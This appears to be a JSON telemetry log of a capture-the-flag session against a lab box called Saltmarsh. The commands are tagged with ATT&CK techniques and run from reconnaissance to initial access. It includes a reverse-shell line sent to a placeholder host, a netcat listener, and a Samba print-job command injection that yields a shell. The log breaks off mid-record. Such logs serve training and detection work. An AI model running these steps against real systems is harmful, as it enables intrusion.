{
  "schema_version": "1.4",
  "session": {
    "uuid": "de00f0e1-0001-4000-8000-000000000001",
    "started_at": "2026-07-07T19:00:00.000Z",
    "ended_at": "2026-07-07T19:14:23.600Z",
    "target_scope": "Breachyard :: Saltmarsh",
    "context_path": "host",
    "shell": "bash",
    "source": "local_pty",
    "machine": {
      "name": "Saltmarsh",
      "os": "Linux",
      "difficulty": "Medium",
      "retired": true
    },
    "target": {
      "platform": "breachyard",
      "kind": "box",
      "name": "Saltmarsh",
      "slug": "saltmarsh",
      "os": "Linux",
      "difficulty": {
        "level": 3,
        "label": "Medium"
      },
      "emblem": {
        "avatar": "data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2064%2064%22%3E%3Cpath%20d%3D%22M32%203%2057%2017.5v29L32%2061%207%2046.5v-29Z%22%20fill%3D%22%230e1a2e%22%20stroke%3D%22%232fe6b0%22%20stroke-width%3D%222.6%22%2F%3E%3Ccircle%20cx%3D%2242%22%20cy%3D%2222%22%20r%3D%226.4%22%20fill%3D%22%23f2c26b%22%2F%3E%3Ccircle%20cx%3D%2245%22%20cy%3D%2220%22%20r%3D%225.4%22%20fill%3D%22%230e1a2e%22%2F%3E%3Cpath%20d%3D%22M9%2041q11-6%2023-1t23-2v8L32%2058%209%2046Z%22%20fill%3D%22%232fe6b0%22%20opacity%3D%220.85%22%2F%3E%3Cpath%20d%3D%22M19%2041V30M23%2041V32M27%2041V28M37%2042V33M41%2042V35%22%20stroke%3D%22%239fe9d3%22%20stroke-width%3D%221.7%22%20stroke-linecap%3D%22round%22%2F%3E%3C%2Fsvg%3E",
        "hue": null
      },
      "url": null
    }
  },
  "episodes": [
    {
      "seq": 1,
      "cmd": "nmap -p- --min-rate 10000 saltmarsh.range",
      "binary": "nmap",
      "started_at_ms": 1783450802000,
      "duration_ms": 48000,
      "gap_before_ms": 0,
      "exit_code": 0,
      "actor": "machine_bound",
      "output_digest": "22/tcp ssh · 139/tcp netbios-ssn · 445/tcp microsoft-ds · full TCP sweep",
      "tactic": "TA0007",
      "technique": "T1046",
      "confidence": 0.9,
      "noise_weight": 4,
      "volume": 2000,
      "context_path": "host",
      "alignment": "match",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 2,
      "cmd": "nmap -p 22,139,445 -sCV saltmarsh.range",
      "binary": "nmap",
      "started_at_ms": 1783450865000,
      "duration_ms": 22000,
      "gap_before_ms": 15000,
      "exit_code": 0,
      "actor": "machine_bound",
      "output_digest": "22/tcp OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 · 139,445/tcp Samba smbd 4.6.2 · looks like Ubuntu 24.04 LTS",
      "tactic": "TA0007",
      "technique": "T1046",
      "confidence": 0.9,
      "noise_weight": 4,
      "volume": 100,
      "context_path": "host",
      "alignment": "alternative",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 3,
      "cmd": "nmblookup -A saltmarsh.range",
      "binary": "nmblookup",
      "started_at_ms": 1783450907000,
      "duration_ms": 3000,
      "gap_before_ms": 20000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "SALTMARSH <00><03><20> B · WORKGROUP <00><1d><1e> · <20> set, File Server Service is up",
      "tactic": "TA0007",
      "technique": "T1059",
      "confidence": 0.2,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "alternative",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 4,
      "cmd": "smbclient -L //saltmarsh.range/ -N",
      "binary": "smbclient",
      "started_at_ms": 1783450922000,
      "duration_ms": 3500,
      "gap_before_ms": 12000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "HP-Reception (Printer) · projects (Disk) · transfer (Disk) · IPC$ · anonymous listing succeeds",
      "tactic": "TA0007",
      "technique": "T1059",
      "confidence": 0.2,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "match",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 5,
      "cmd": "rpcclient -N saltmarsh.range -U \"\" -c enumdomusers",
      "binary": "rpcclient",
      "started_at_ms": 1783450935500,
      "duration_ms": 2200,
      "gap_before_ms": 10000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "user:[scott] rid:[0x3e8] · single domain user, null session",
      "tactic": "TA0007",
      "technique": "T1059",
      "confidence": 0.2,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "match",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 6,
      "cmd": "rpcclient -N saltmarsh.range -U \"\" -c netshareenumall",
      "binary": "rpcclient",
      "started_at_ms": 1783450943700,
      "duration_ms": 2600,
      "gap_before_ms": 6000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "HP-Reception -> C:\\var\\spool\\samba · projects -> C:\\srv\\projects · transfer -> C:\\srv\\transfer",
      "tactic": "TA0007",
      "technique": "T1059",
      "confidence": 0.2,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "alternative",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 7,
      "cmd": "echo 'bash -i >& /dev/tcp/x.x.x.x/443 0>&1' > '|bash'",
      "binary": "echo",
      "started_at_ms": 1783451186300,
      "duration_ms": 400,
      "gap_before_ms": 240000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "payload written · the print command forwards the job description through %J unescaped (CVE-2026-4480)",
      "tactic": "TA0002",
      "technique": "T1059",
      "confidence": 0.85,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "match",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "execution"
      }
    },
    {
      "seq": 8,
      "cmd": "nc -lnvp 443",
      "binary": "nc",
      "started_at_ms": 1783451194700,
      "duration_ms": 600,
      "gap_before_ms": 8000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "listening on [any] 443 ...",
      "tactic": "TA0002",
      "technique": "T1059",
      "confidence": 0.65,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "match",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "execution"
      }
    },
    {
      "seq": 9,
      "cmd": "smbclient //saltmarsh.range/HP-Reception -N -c 'print \"|bash\"'",
      "binary": "smbclient",
      "started_at_ms": 1783451200300,
      "duration_ms": 2800,
      "gap_before_ms": 5000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "putting file |bash as the print job · job description runs as a shell command · nobody@saltmarsh:/var/spool/samba$ (caught on the listener)",
      "tactic": "TA0007",
      "technique": "T1059",
      "confidence": 0.2,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "alternative",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 10,
      "cmd": "script /dev/null -c bash",
      "binary": "script",
      "started_at_ms": 1783451209100,
      "duration_ms": 1800,
      "gap_before_ms": 6000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "nobody@saltmarsh:/var/spool/samba$ · upgraded to a full tty",
      "tactic": "TA0007",
      "technique": "T1059",
      "confidence": 0.2,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "alternative",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "reconnaissance"
      }
    },
    {
      "seq": 11,
      "cmd": "whoami",
      "binary": "whoami",
      "started_at_ms": 1783451214900,
      "duration_ms": 300,
      "gap_before_ms": 4000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "nobody",
      "tactic": "TA0004",
      "technique": "T1033",
      "confidence": 0.6,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "match",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "privilege-escalation"
      }
    },
    {
      "seq": 12,
      "cmd": "id",
      "binary": "id",
      "started_at_ms": 1783451217700,
      "duration_ms": 300,
      "gap_before_ms": 2500,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)",
      "tactic": "TA0004",
      "technique": "T1033",
      "confidence": 0.6,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "alternative",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "privilege-escalation"
      }
    },
    {
      "seq": 13,
      "cmd": "cat /etc/passwd | grep 'sh$'",
      "binary": "cat",
      "started_at_ms": 1783451243000,
      "duration_ms": 700,
      "gap_before_ms": 25000,
      "exit_code": 0,
      "actor": "human_active",
      "output_digest": "root:x:0:0:root:/root:/bin/bash · scott:x:1000:1001:Scott Hale:/home/scott:/bin/bash · marcus:x:1001:1002:Marcus Orr:/home/marcus:/bin/bash",
      "tactic": "TA0004",
      "technique": "T1083",
      "confidence": 0.5,
      "noise_weight": 1,
      "volume": 1,
      "context_path": "host",
      "alignment": "match",
      "loop_of_seq": null,
      "frameworks": {
        "ukc": "privilege-escalation"
      }
    },
    {
      "seq": 14,
      "cmd": "ls /opt/offsite-backup",
      "binary": "ls",
      "started_at_ms": 1783451278700,
      "duration_ms": 500,
      "gap_before_ms": 35000,
      "exit_code": 0,
      "actor": "human_active",